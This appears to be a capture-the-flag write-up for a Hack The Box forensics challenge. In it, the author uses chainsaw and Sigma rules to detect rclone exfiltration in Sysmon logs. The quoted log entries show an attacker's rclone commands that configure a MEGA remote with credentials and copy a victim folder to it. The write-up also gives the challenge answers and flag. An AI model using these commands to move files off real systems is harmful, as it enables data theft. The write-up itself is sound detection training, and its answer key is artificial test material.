Packet Cyclone
11 minutes to read
We have this description for the challenge:
Pandora’s friend and partner, Wade, is the one that leads the investigation into the relic’s location. Recently, he noticed some weird traffic coming from his host. That led him to believe that his host was compromised. After a quick investigation, his fear was confirmed. Pandora tries now to see if the attacker caused the suspicious traffic during the exfiltration phase. Pandora believes that the malicious actor used rclone to exfiltrate Wade’s research to the cloud. Using the tool called “chainsaw” and the sigma rules provided, can you detect the usage of rclone from the event logs produced by Sysmon? To get the flag, you need to start and connect to the docker service and answer all the questions correctly.
And we are given these files:
$ tree
.
βββ Logs
βΒ Β βββ Application.evtx
βΒ Β βββ HardwareEvents.evtx
βΒ Β βββ Internet Explorer.evtx
βΒ Β βββ Key Management Service.evtx
βΒ Β βββ Microsoft-Client-Licensing-Platform%4Admin.evtx
βΒ Β βββ Microsoft-Windows-AAD%4Operational.evtx
βΒ Β βββ Microsoft-Windows-AppModel-Runtime%4Admin.evtx
βΒ Β βββ Microsoft-Windows-AppReadiness%4Admin.evtx
βΒ Β βββ Microsoft-Windows-AppReadiness%4Operational.evtx
βΒ Β βββ Microsoft-Windows-AppXDeployment%4Operational.evtx
βΒ Β βββ Microsoft-Windows-AppXDeploymentServer%4Operational.evtx
βΒ Β βββ Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx
βΒ Β βββ Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx
βΒ Β βββ Microsoft-Windows-Application-Experience%4Program-Compatibility-Troubleshooter.evtx
βΒ Β βββ Microsoft-Windows-Application-Experience%4Program-Inventory.evtx
βΒ Β βββ Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx
βΒ Β βββ Microsoft-Windows-Application-Experience%4Steps-Recorder.evtx
βΒ Β βββ Microsoft-Windows-AppxPackaging%4Operational.evtx
βΒ Β βββ Microsoft-Windows-Audio%4CaptureMonitor.evtx
βΒ Β βββ Microsoft-Windows-Audio%4Operational.evtx
βΒ Β βββ Microsoft-Windows-Audio%4PlaybackManager.evtx
βΒ Β βββ Microsoft-Windows-Authentication User Interface%4Operational.evtx
βΒ Β βββ Microsoft-Windows-Biometrics%4Operational.evtx
βΒ Β βββ Microsoft-Windows-BitLocker%4BitLocker Management.evtx
βΒ Β βββ Microsoft-Windows-Bits-Client%4Operational.evtx
βΒ Β βββ Microsoft-Windows-CloudStore%4Operational.evtx
βΒ Β βββ Microsoft-Windows-CodeIntegrity%4Operational.evtx
βΒ Β βββ Microsoft-Windows-Containers-BindFlt%4Operational.evtx
βΒ Β βββ Microsoft-Windows-Containers-Wcifs%4Operational.evtx
βΒ Β βββ Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx
βΒ Β βββ Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx
βΒ Β βββ Microsoft-Windows-Crypto-DPAPI%4Operational.evtx
βΒ Β βββ Microsoft-Windows-Crypto-NCrypt%4Operational.evtx
βΒ Β βββ Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx
βΒ Β βββ Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Operational.evtx
βΒ Β βββ Microsoft-Windows-DeviceSetupManager%4Admin.evtx
βΒ Β βββ Microsoft-Windows-DeviceSetupManager%4Operational.evtx
βΒ Β βββ Microsoft-Windows-Dhcp-Client%4Admin.evtx
βΒ Β βββ Microsoft-Windows-Dhcpv6-Client%4Admin.evtx
βΒ Β βββ Microsoft-Windows-Diagnosis-DPS%4Operational.evtx
βΒ Β βββ Microsoft-Windows-Diagnosis-PLA%4Operational.evtx
βΒ Β βββ Microsoft-Windows-Diagnosis-Scripted%4Admin.evtx
βΒ Β βββ Microsoft-Windows-Diagnosis-Scripted%4Operational.evtx
βΒ Β βββ Microsoft-Windows-Diagnosis-Scheduled%4Operational.evtx
βΒ Β βββ Microsoft-Windows-Diagnostics-Performance%4Operational.evtx
βΒ Β βββ Microsoft-Windows-DiskDiagnosticDataCollector%4Operational.evtx
βΒ Β βββ Microsoft-Windows-FileHistory-Core%4WHC.evtx
βΒ Β βββ Microsoft-Windows-GroupPolicy%4Operational.evtx
βΒ Β βββ Microsoft-Windows-HelloForBusiness%4Operational.evtx
βΒ Β βββ Microsoft-Windows-HotspotAuth%4Operational.evtx
βΒ Β βββ Microsoft-Windows-IKE%4Operational.evtx
βΒ Β βββ Microsoft-Windows-Kernel-Boot%4Operational.evtx
βΒ Β βββ Microsoft-Windows-Kernel-EventTracing%4Admin.evtx
βΒ Β βββ Microsoft-Windows-Kernel-PnP%4Configuration.evtx
βΒ Β βββ Microsoft-Windows-Kernel-PnP%4Driver Watchdog.evtx
βΒ Β βββ Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx
βΒ Β βββ Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx
βΒ Β βββ Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx
βΒ Β βββ Microsoft-Windows-Kernel-WHEA%4Errors.evtx
βΒ Β βββ Microsoft-Windows-Kernel-WHEA%4Operational.evtx
βΒ Β βββ Microsoft-Windows-Known Folders API Service.evtx
βΒ Β βββ Microsoft-Windows-LanguagePackSetup%4Operational.evtx
βΒ Β βββ Microsoft-Windows-LiveId%4Operational.evtx
βΒ Β βββ Microsoft-Windows-MUI%4Admin.evtx
βΒ Β βββ Microsoft-Windows-MUI%4Operational.evtx
βΒ Β βββ Microsoft-Windows-ModernDeployment-Diagnostics-Provider%4Admin.evtx
βΒ Β βββ Microsoft-Windows-ModernDeployment-Diagnostics-Provider%4Autopilot.evtx
βΒ Β βββ Microsoft-Windows-ModernDeployment-Diagnostics-Provider%4ManagementService.evtx
βΒ Β βββ Microsoft-Windows-NCSI%4Operational.evtx
βΒ Β βββ Microsoft-Windows-NetworkProfile%4Operational.evtx
βΒ Β βββ Microsoft-Windows-Ntfs%4Operational.evtx
βΒ Β βββ Microsoft-Windows-Ntfs%4WHC.evtx
βΒ Β βββ Microsoft-Windows-Partition%4Diagnostic.evtx
βΒ Β βββ Microsoft-Windows-PowerShell%4Admin.evtx
βΒ Β βββ Microsoft-Windows-PowerShell%4Operational.evtx
βΒ Β βββ Microsoft-Windows-Privacy-Auditing%4Operational.evtx
βΒ Β βββ Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx
βΒ Β βββ Microsoft-Windows-Provisioning-Diagnostics-Provider%4Admin.evtx
βΒ Β βββ Microsoft-Windows-Provisioning-Diagnostics-Provider%4AutoPilot.evtx
βΒ Β βββ Microsoft-Windows-Provisioning-Diagnostics-Provider%4ManagementService.evtx
βΒ Β βββ Microsoft-Windows-PushNotification-Platform%4Admin.evtx
βΒ Β βββ Microsoft-Windows-PushNotification-Platform%4Operational.evtx
βΒ Β βββ Microsoft-Windows-ReadyBoost%4Operational.evtx
βΒ Β βββ Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx
βΒ Β βββ Microsoft-Windows-RestartManager%4Operational.evtx
βΒ Β βββ Microsoft-Windows-SMBClient%4Operational.evtx
βΒ Β βββ Microsoft-Windows-SMBServer%4Audit.evtx
βΒ Β βββ Microsoft-Windows-SMBServer%4Connectivity.evtx
βΒ Β βββ Microsoft-Windows-SMBServer%4Operational.evtx
βΒ Β βββ Microsoft-Windows-SMBServer%4Security.evtx
βΒ Β βββ Microsoft-Windows-Security-Mitigations%4KernelMode.evtx
βΒ Β βββ Microsoft-Windows-Security-Mitigations%4UserMode.evtx
βΒ Β βββ Microsoft-Windows-Security-SPP-UX-Notifications%4ActionCenter.evtx
βΒ Β βββ Microsoft-Windows-SettingSync%4Debug.evtx
βΒ Β βββ Microsoft-Windows-SettingSync%4Operational.evtx
βΒ Β βββ Microsoft-Windows-Shell-ConnectedAccountState%4ActionCenter.evtx
βΒ Β βββ Microsoft-Windows-Shell-Core%4ActionCenter.evtx
βΒ Β βββ Microsoft-Windows-Shell-Core%4AppDefaults.evtx
βΒ Β βββ Microsoft-Windows-Shell-Core%4LogonTasksChannel.evtx
βΒ Β βββ Microsoft-Windows-Shell-Core%4Operational.evtx
βΒ Β βββ Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx
βΒ Β βββ Microsoft-Windows-SmbClient%4Audit.evtx
βΒ Β βββ Microsoft-Windows-SmbClient%4Connectivity.evtx
βΒ Β βββ Microsoft-Windows-SmbClient%4Security.evtx
βΒ Β βββ Microsoft-Windows-StateRepository%4Operational.evtx
βΒ Β βββ Microsoft-Windows-StateRepository%4Restricted.evtx
βΒ Β βββ Microsoft-Windows-Storage-Storport%4Health.evtx
βΒ Β βββ Microsoft-Windows-Storage-Storport%4Operational.evtx
βΒ Β βββ Microsoft-Windows-StorageSpaces-Driver%4Diagnostic.evtx
βΒ Β βββ Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx
βΒ Β βββ Microsoft-Windows-StorageSpaces-ManagementAgent%4WHC.evtx
βΒ Β βββ Microsoft-Windows-Store%4Operational.evtx
βΒ Β βββ Microsoft-Windows-Storsvc%4Diagnostic.evtx
βΒ Β βββ Microsoft-Windows-Sysmon%4Operational.evtx
βΒ Β βββ Microsoft-Windows-TWinUI%4Operational.evtx
βΒ Β βββ Microsoft-Windows-TZSync%4Operational.evtx
βΒ Β βββ Microsoft-Windows-TaskScheduler%4Maintenance.evtx
βΒ Β βββ Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx
βΒ Β βββ Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx
βΒ Β βββ Microsoft-Windows-Time-Service%4Operational.evtx
βΒ Β βββ Microsoft-Windows-UAC%4Operational.evtx
βΒ Β βββ Microsoft-Windows-UniversalTelemetryClient%4Operational.evtx
βΒ Β βββ Microsoft-Windows-User Device Registration%4Admin.evtx
βΒ Β βββ Microsoft-Windows-User Profile Service%4Operational.evtx
βΒ Β βββ Microsoft-Windows-UserPnp%4ActionCenter.evtx
βΒ Β βββ Microsoft-Windows-UserPnp%4DeviceInstall.evtx
βΒ Β βββ Microsoft-Windows-VPN%4Operational.evtx
βΒ Β βββ Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx
βΒ Β βββ Microsoft-Windows-WER-PayloadHealth%4Operational.evtx
βΒ Β βββ Microsoft-Windows-WFP%4Operational.evtx
βΒ Β βββ Microsoft-Windows-WMI-Activity%4Operational.evtx
βΒ Β βββ Microsoft-Windows-Wcmsvc%4Operational.evtx
βΒ Β βββ Microsoft-Windows-WebAuthN%4Operational.evtx
βΒ Β βββ Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx
βΒ Β βββ Microsoft-Windows-WinRM%4Operational.evtx
βΒ Β βββ Microsoft-Windows-Windows Defender%4Operational.evtx
βΒ Β βββ Microsoft-Windows-Windows Defender%4WHC.evtx
βΒ Β βββ Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx
βΒ Β βββ Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx
βΒ Β βββ Microsoft-Windows-Windows Firewall With Advanced Security%4FirewallDiagnostics.evtx
βΒ Β βββ Microsoft-Windows-WindowsBackup%4ActionCenter.evtx
βΒ Β βββ Microsoft-Windows-WindowsSystemAssessmentTool%4Operational.evtx
βΒ Β βββ Microsoft-Windows-WindowsUpdateClient%4Operational.evtx
βΒ Β βββ Microsoft-Windows-Winlogon%4Operational.evtx
βΒ Β βββ Microsoft-Windows-WorkFolders%4WHC.evtx
βΒ Β βββ Security.evtx
βΒ Β βββ Setup.evtx
βΒ Β βββ System.evtx
βΒ Β βββ Windows PowerShell.evtx
βββ sigma_rules
βββ rclone_config_creation.yaml
βββ rclone_execution.yaml
3 directories, 151 files
Understanding the challenge
The challenge is related to Rclone, which is a tool to manage files on cloud storage. We are given a lot of EVTX files that stand for Windows event logs. Moreover, we have some Sigma rules, which is a generic and open signature format that allows you to describe relevant log events in a straightforward manner.
The challenge description mentions chainsaw. This tool takes Windows EVTX files and Sigma rules to discover indicators of compromise (IoC).
Indicators of compromise
Let’s run chainsaw:
$ wget -q https://github.com/WithSecureLabs/chainsaw/releases/download/v2.6.0/chainsaw_x86_64-unknown-linux-gnu.tar.gz
$ tar xvfz chainsaw_x86_64-unknown-linux-gnu.tar.gz
x chainsaw/LICENCE
x chainsaw/README.md
x chainsaw/chainsaw
x chainsaw/mappings/
x chainsaw/mappings/sigma-event-logs-all.yml
x chainsaw/mappings/sigma-mft-logs-all.yml
x chainsaw/mappings/sigma-event-logs-legacy.yml
$ ./chainsaw/chainsaw
Rapidly work with Forensic Artefacts
Usage: chainsaw [OPTIONS] <COMMAND>
Commands:
dump Dump an artefact into a different format
hunt Hunt through artefacts using detection rules for threat detection
lint Lint provided rules to ensure that they load correctly
search Search through forensic artefacts for keywords
analyse Perform various analyses on artifacts
help Print this message or the help of the given subcommand(s)
Options:
--no-banner Hide Chainsaw's banner
--num-threads <NUM_THREADS> Limit the thread number (default: num of CPUs)
-h, --help Print help
-V, --version Print version
Examples:
Hunt with Sigma and Chainsaw Rules:
./chainsaw hunt evtx_attack_samples/ -s sigma/ --mapping mappings/sigma-event-logs-all.yml -r rules/
Hunt with Sigma rules and output in JSON:
./chainsaw hunt evtx_attack_samples/ -s sigma/ --mapping mappings/sigma-event-logs-all.yml --json
Search for the case-insensitive word 'mimikatz':
./chainsaw search mimikatz -i evtx_attack_samples/
Search for Powershell Script Block Events (EventID 4014):
./chainsaw search -t 'Event.System.EventID: =4104' evtx_attack_samples/
$ ./chainsaw/chainsaw hunt --sigma sigma_rules/ --mapping chainsaw/mappings/sigma-event-logs-all.yml Logs/
ββββββββββ βββ ββββββ βββββββ βββββββββββ ββββββ βββ βββ
βββββββββββ βββββββββββββββββββ ββββββββββββββββββββββ βββ
βββ βββββββββββββββββββββββββ ββββββββββββββββββββββ ββ βββ
βββ βββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββ ββββββ βββββββββ βββββββββββββββββ βββββββββββββ
ββββββββββ ββββββ βββββββββ ββββββββββββββββ βββ ββββββββ
By Countercept (@FranticTyping, @AlexKornitzer)
[+] Loading detection rules from: sigma_rules/
[+] Loaded 2 detection rules
[+] Loading forensic artefacts from: Logs/ (extensions: .evtx, .evt)
[+] Loaded 149 forensic artefacts (54.3 MB)
[+] Hunting: [========================================] 149/149
[+] Group: Sigma
βββββββββββββββββββββββ¬βββββββββββββββββββββββββββββ¬ββββββββ¬βββββββββββββββββββββββββββ¬βββββββββββ¬ββββββββββββ¬ββββββββββββββββββ¬βββββββββββββββββββββββββββββββββ
β timestamp β detections β count β Event.System.Provider β Event ID β Record ID β Computer β Event Data β
βββββββββββββββββββββββΌβββββββββββββββββββββββββββββΌββββββββΌβββββββββββββββββββββββββββΌβββββββββββΌββββββββββββΌββββββββββββββββββΌβββββββββββββββββββββββββββββββββ€
β 2023-02-24 15:35:07 β β£ Rclone Execution via β 1 β Microsoft-Windows-Sysmon β 1 β 76 β DESKTOP-UTDHED2 β CommandLine: '"C:\Users\wade\A β
β β Command Line or PowerShell β β β β β β ppData\Local\Temp\rclone-v1.61 β
β β β β β β β β .1-windows-amd64\rclone.exe" c β
β β β β β β β β onfig create remote mega user β
β β β β β β β β majmeret@protonmail.com pass F β
β β β β β β β β BMeavdiaFZbWzpMqIVhJCGXZ5XXZI1 β
β β β β β β β β qsU3EjhoKQw0rEoQqHyI' β
β β β β β β β β Company: https://rclone.org β
β β β β β β β β CurrentDirectory: C:\Users\wad β
β β β β β β β β e\AppData\Local\Temp\rclone-v1 β
β β β β β β β β .61.1-windows-amd64\ β
β β β β β β β β Description: Rsync for cloud s β
β β β β β β β β torage β
β β β β β β β β FileVersion: 1.61.1 β
β β β β β β β β Hashes: SHA256=E94901809FF7CC5 β
β β β β β β β β 168C1E857D4AC9CBB339CA1F6E21DC β
β β β β β β β β CE95DFB8E28DF799961 β
β β β β β β β β Image: C:\Users\wade\AppData\L β
β β β β β β β β ocal\Temp\rclone-v1.61.1-windo β
β β β β β β β β ws-amd64\rclone.exe β
β β β β β β β β IntegrityLevel: Medium β
β β β β β β β β LogonGuid: 10DA3E43-D892-63F8- β
β β β β β β β β 4B6D-030000000000 β
β β β β β β β β LogonId: '0x36d4b' β
β β β β β β β β OriginalFileName: rclone.exe β
β β β β β β β β ParentCommandLine: '"C:\Window β
β β β β β β β β s\System32\WindowsPowerShell\v β
β β β β β β β β 1.0\powershell.exe" ' β
β β β β β β β β ParentImage: C:\Windows\System β
β β β β β β β β 32\WindowsPowerShell\v1.0\powe β
β β β β β β β β rshell.exe β
β β β β β β β β ParentProcessGuid: 10DA3E43-D8 β
β β β β β β β β D2-63F8-9B00-000000000900 β
β β β β β β β β ParentProcessId: 5888 β
β β β β β β β β ParentUser: DESKTOP-UTDHED2\wa β
β β β β β β β β de β
β β β β β β β β ProcessGuid: 10DA3E43-D92B-63F β
β β β β β β β β 8-B100-000000000900 β
β β β β β β β β ProcessId: 3820 β
β β β β β β β β Product: Rclone β
β β β β β β β β RuleName: '-' β
β β β β β β β β TerminalSessionId: 1 β
β β β β β β β β User: DESKTOP-UTDHED2\wade β
β β β β β β β β UtcTime: 2023-02-24 15:35:07.3 β
β β β β β β β β 36 β
βββββββββββββββββββββββΌβββββββββββββββββββββββββββββΌββββββββΌβββββββββββββββββββββββββββΌβββββββββββΌββββββββββββΌββββββββββββββββββΌβββββββββββββββββββββββββββββββββ€
β 2023-02-24 15:35:17 β β£ Rclone Execution via β 1 β Microsoft-Windows-Sysmon β 1 β 78 β DESKTOP-UTDHED2 β CommandLine: '"C:\Users\wade\A β
β β Command Line or PowerShell β β β β β β ppData\Local\Temp\rclone-v1.61 β
β β β β β β β β .1-windows-amd64\rclone.exe" c β
β β β β β β β β opy C:\Users\Wade\Desktop\Reli β
β β β β β β β β c_location\ remote:exfiltratio β
β β β β β β β β n -v' β
β β β β β β β β Company: https://rclone.org β
β β β β β β β β CurrentDirectory: C:\Users\wad β
β β β β β β β β e\AppData\Local\Temp\rclone-v1 β
β β β β β β β β .61.1-windows-amd64\ β
β β β β β β β β Description: Rsync for cloud s β
β β β β β β β β torage β
β β β β β β β β FileVersion: 1.61.1 β
β β β β β β β β Hashes: SHA256=E94901809FF7CC5 β
β β β β β β β β 168C1E857D4AC9CBB339CA1F6E21DC β
β β β β β β β β CE95DFB8E28DF799961 β
β β β β β β β β Image: C:\Users\wade\AppData\L β
β β β β β β β β ocal\Temp\rclone-v1.61.1-windo β
β β β β β β β β ws-amd64\rclone.exe β
β β β β β β β β IntegrityLevel: Medium β
β β β β β β β β LogonGuid: 10DA3E43-D892-63F8- β
β β β β β β β β 4B6D-030000000000 β
β β β β β β β β LogonId: '0x36d4b' β
β β β β β β β β OriginalFileName: rclone.exe β
β β β β β β β β ParentCommandLine: '"C:\Window β
β β β β β β β β s\System32\WindowsPowerShell\v β
β β β β β β β β 1.0\powershell.exe" ' β
β β β β β β β β ParentImage: C:\Windows\System β
β β β β β β β β 32\WindowsPowerShell\v1.0\powe β
β β β β β β β β rshell.exe β
β β β β β β β β ParentProcessGuid: 10DA3E43-D8 β
β β β β β β β β D2-63F8-9B00-000000000900 β
β β β β β β β β ParentProcessId: 5888 β
β β β β β β β β ParentUser: DESKTOP-UTDHED2\wa β
β β β β β β β β de β
β β β β β β β β ProcessGuid: 10DA3E43-D935-63F β
β β β β β β β β 8-B200-000000000900 β
β β β β β β β β ProcessId: 5116 β
β β β β β β β β Product: Rclone β
β β β β β β β β RuleName: '-' β
β β β β β β β β TerminalSessionId: 1 β
β β β β β β β β User: DESKTOP-UTDHED2\wade β
β β β β β β β β UtcTime: 2023-02-24 15:35:17.5 β
β β β β β β β β 16 β
βββββββββββββββββββββββ΄βββββββββββββββββββββββββββββ΄ββββββββ΄βββββββββββββββββββββββββββ΄βββββββββββ΄ββββββββββββ΄ββββββββββββββββββ΄βββββββββββββββββββββββββββββββββ
[+] 2 Detections found on 2 documents
Solution
Now we can connect to the remote instance and answer the questions (all the needed information appears in the table above):
$ nc 157.245.38.221 32724
+----------------+-------------------------------------------------------------------------------+
| Title | Description |
+----------------+-------------------------------------------------------------------------------+
| Packet Cyclone | Pandora's friend and partner, Wade, is the one that leads |
| | the investigation into the relic's location. |
| | Recently, he noticed some weird traffic coming from his host. |
| | That led him to believe that his host was compromised. |
| | After a quick investigation, his fear was confirmed. Pandora tries now to see |
| | if the attacker caused the suspicious traffic during the exfiltration phase. |
| | Pandora believes that the malicious actor used rclone |
| | to exfiltrate Wade's research to the cloud. |
| | Using the tool chainsaw and many sigma rules that can be found online, |
| | can you detect the usage of rclone from the event logs produced by Sysmon? |
| | To get the flag, you need to start and connect |
| | to the docker service and answer all the questions correctly. |
+----------------+-------------------------------------------------------------------------------+
What is the email of the attacker used for the exfiltration process? (for example: name@email.com)
> majmeret@protonmail.com
[+] Correct!
What is the password of the attacker used for the exfiltration process? (for example: password123)
> FBMeavdiaFZbWzpMqIVhJCGXZ5XXZI1qsU3EjhoKQw0rEoQqHyI
[+] Correct!
What is the Cloud storage provider used by the attacker? (for example: cloud)
> mega
[+] Correct!
What is the ID of the process used by the attackers to configure their tool? (for example: 1337)
> 3820
[+] Correct!
What is the name of the folder the attacker exfiltrated; provide the full path. (for example: C:\Users\user\folder)
> C:\Users\Wade\Desktop\Relic_location
[+] Correct!
What is the name of the folder the attacker exfiltrated the files to? (for example: exfil_folder)
> exfiltration
[+] Correct!
Flag
And here’s the flag:
[+] Here is the flag: HTB{Rcl0n3_1s_n0t_s0_inn0c3nt_4ft3r_4ll}